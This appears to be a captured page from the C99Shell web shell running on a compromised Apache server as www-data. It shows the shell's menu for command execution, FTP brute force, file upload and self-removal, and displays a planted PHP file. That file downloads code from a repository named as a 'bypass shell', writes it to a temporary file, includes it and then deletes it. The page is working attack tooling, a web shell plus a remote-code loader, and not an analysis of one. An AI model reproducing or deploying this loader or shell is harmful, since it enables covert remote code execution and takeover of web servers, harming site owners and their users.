!C99Shell v. 2.0 [PHP 7 Update] [25.02.2019]!

Software: Apache. PHP/5.6.40 

uname -a: Linux p924.phpnet.org 5.15.0-86-generic #96-Ubuntu SMP Wed Sep 20 08:23:49 UTC 2023 x86_64 

uid=33(www-data) gid=33(www-data) groups=33(www-data) 

Safe-mode: OFF (not secure)

/home/www/BORDEMONVERT/   drwxr-xr-x
Free 136.56 GB of 150 GB (91.04%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     MMCTV32.php (1.44 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php
ini_set
('display_errors'1);
ini_set('display_startup_errors'1);
error_reporting(E_ALL);

function 
getRemoteCode($url) {
    
$code = @file_get_contents($url);
    
    if (
$code === false) {
        
$ch curl_init();
        
curl_setopt($chCURLOPT_URL$url);
        
curl_setopt($chCURLOPT_RETURNTRANSFER1);
        
curl_setopt($chCURLOPT_SSL_VERIFYPEERfalse);
        
curl_setopt($chCURLOPT_FOLLOWLOCATIONtrue);
        
curl_setopt($chCURLOPT_TIMEOUT10);
        
$code curl_exec($ch);
        
$http_code curl_getinfo($chCURLINFO_HTTP_CODE);
        
curl_close($ch);

        if (
$http_code !== 200 || empty($code)) {
            return 
false;
        }
    }
    return 
$code;
}

if (!
function_exists('get_magic_quotes_gpc')) {
    function 
get_magic_quotes_gpc() {
        return 
false;
    }
}

$url "https://cdn.jsdelivr.net/gh/JohnFelixx/MMCT-BYPASS-SHELL@main/MMCT32.txt";
$code getRemoteCode($url);

if (
$code !== false) {
    try {
        
ob_start();
        
        
// Tulis kode apa adanya ke file sementara tanpa menambahkan <?php
        
$tempFile tempnam(sys_get_temp_dir(), 'remote_code_');
        
file_put_contents($tempFile$code);
        include 
$tempFile;
        
unlink($tempFile); 
        
        
ob_end_flush();
    } catch (
Throwable $e) {
        
ob_end_clean();
        die(
"Terjadi kesalahan dalam eksekusi kode: " $e->getMessage());
    }
} else {
    die(
"Gagal mengambil data dari URL.");
}
?>

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.0 [PHP 7 Update] [25.02.2019] maintained by KaizenLouie | C99Shell Github | Generation time: 0.0533 ]--